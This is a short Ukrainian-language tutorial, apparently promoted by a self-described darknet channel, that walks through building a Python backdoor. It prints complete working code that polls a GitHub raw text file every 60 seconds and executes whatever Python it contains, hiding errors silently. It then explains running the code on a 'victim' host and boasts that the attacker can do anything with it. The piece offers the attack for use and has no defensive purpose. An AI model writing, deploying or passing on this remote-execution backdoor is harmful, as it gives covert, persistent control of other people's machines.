Самий простий backdoor на python
Сьогодні ми розберемо як написати самий найпростіший backdoor з необмеженими можливостями. Backdoor можна писати на різних мовах програмування, але в даному випадку ми візьмемо python, оскільки він кросплатформений. Нам потрібні такі сервіси: github.com , pythonanywhere.com. Гітхаб в нас буде використовуватись як сервер, на якому розміщена корисна нагрузка. Інший сервіс буде виступати в ролі жертви.
План:
- Реєструємось та створюємо репозиторій на гітхабі.
- Створюємо там txt файл, його ми будемо редагувати час від часу.
- Реєстуємось на pythonanywhere.com та створюємо та запускаємо через bash консоль py файл із наступним кодом:
import requests,time
def pansdfhreh(url):
r = requests.get(url, timeout=None)
try:
exec(r.text)
except:
pass
while True:
try:
pansdfhreh("https://raw.githubusercontent.com/jsahhjasdgshj/sdhf/master/textfile.txt")
time.sleep(60)
except:
pass
Отже, ми створили репозиторій та txt файл в ньому. Для тесту, введемо в ньому кілька команд на python, команди можуть бути абсолютно любі).
Тепер перейдемо до сервісу pythonanywhere.com там ми створюємо py файл з кодом вище.
Після того відкриваємо bash консоль та пишемо наступну команду python payload.py .
Як бачимо backdoor успішно зчитує та виконує код з текстового файлу на репозиторії гітхаб. Кожних 60 секунд бекдор звертається до текстового файлу гітхабі зчитує та виконує любий python код звідти.
Щоб змінити код для виконання на хості жертви, відредагуйте txt файл на гітхабі.
Висновок: Ми створили самий простий кросплатформений backdoor з необмеженими можливостями. Величезний + бекдора втому, що атакующий може виконати абсолютно ЛЮБИЙ код на python та запросто може робити із хостом буквально все що заманеться!
Підписуйтесь на Ukraine_Matrix, перший український DarkNet канал!